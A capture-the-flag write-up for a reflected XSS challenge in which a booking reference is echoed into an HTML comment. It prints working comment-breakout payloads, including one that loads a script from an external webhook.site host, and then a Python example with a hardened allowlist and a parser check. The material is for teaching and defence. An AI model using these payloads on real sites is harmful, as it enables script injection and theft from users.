Webverselabs Challenge Fermata Reflected XSS
Scenario:
Fermata connects clients with piano tuners. An old debug line left over from development drops the booking reference into an HTML comment so ops can scan View Source for bad IDs. It never occurred to anyone that comments are just text — not a fence.
Solution:
First, let's enumerate the application normally.
The first endpoint we find is /tuners, which doesn't return anything useful.
The Posts page also has nothing of use to us:
Now let's try to book a session. I will send the request, then modify it with Burp.
I tried multiple XSS payloads, but all of them led to this redirection:
I even tried to get a callback to my webhook URL, but got nothing.
Let's follow the redirection, which is a GET request to /book?ref=FM-2026….
I tried some XSS payloads and used XSStrike, but couldn't get a payload to execute: whatever we put in the parameter gets rendered back to us inside a comment.
If we read the source code, we see that whatever we type is added to an HTML comment.
Let's try to break out of the HTML comment before our payload, to see if it executes.
The rendered source shows our payload sitting inside the comment, where the browser treats it as plain text:
<!-- debug:booking-ref <img src=x onerror=alert(1)> -->
Now if we prefix the payload with -->, it should close the comment early and leave the tag outside it:
<!-- debug:booking-ref --> <img src=x onerror=alert(1)> -->
Now let's try to get a callback to our webhook URL:
--> <script src=https://webhook.site/26940115-08b9-440e-8ac8-3bbaaa7a></script>
Now if we check our webhook site, we see the callback, which means the payload was executed.
Once the XSS fires, we automatically get the flag.
That's it for this challenge.
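The root cause is that the debug line treats the comment delimiters as a boundary the user cannot cross, so the fix is to validate the reference before it is rendered. Below is an added Python example (not the challenge's code): a stand-in for the vulnerable debug line, a hardened version that allowlists the reference format (the "FM-" plus digits pattern is my assumption, since the page only shows FM-2026…), and an HTMLParser check that reports which tags a browser would actually create from the rendered fragment.

```python
import re
from html.parser import HTMLParser

# Constructed stand-in for the Fermata debug line: the booking reference from
# ?ref= is dropped into an HTML comment with no validation or encoding.
def render_vulnerable(ref: str) -> str:
    return f"<!-- debug:booking-ref {ref} -->"

# Assumed shape of a booking reference (the page only shows "FM-2026..."); this
# allowlist is my assumption, not the challenge's own validation.
BOOKING_REF = re.compile(r"FM-\d{4,16}")

def render_hardened(ref: str) -> str:
    """Only an allowlisted reference reaches the comment; anything else is
    replaced by a fixed marker, so "-->" in the input can never close it."""
    if not BOOKING_REF.fullmatch(ref):
        ref = "invalid"
    return f"<!-- debug:booking-ref {ref} -->"

class _TagCollector(HTMLParser):
    """Records every start tag the parser sees outside comments."""
    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []

    def handle_starttag(self, tag, attrs) -> None:
        self.tags.append(tag)

def leaked_tags(fragment: str) -> list[str]:
    """Tags a browser would actually create from the fragment. A debug comment
    that stays closed yields [], so a non-empty result means the ref broke out."""
    parser = _TagCollector()
    parser.feed(fragment)
    parser.close()
    return parser.tags

# Constructed inputs: a genuine reference and the page's comment-breakout payload.
SAMPLES = ["FM-20260101", "--> <img src=x onerror=alert(1)>"]

def audit() -> dict[str, dict[str, list[str]]]:
    """Run both renderers on both inputs and report which tags leak out."""
    return {
        ref: {
            "vulnerable": leaked_tags(render_vulnerable(ref)),
            "hardened": leaked_tags(render_hardened(ref)),
        }
        for ref in SAMPLES
    }

if __name__ == "__main__":
    for ref, result in audit().items():
        print(repr(ref), result)
```

Note that html.escape is not a fix for this context either: comment contents are never decoded, so the allowlist (or rejecting the request outright) is the right control.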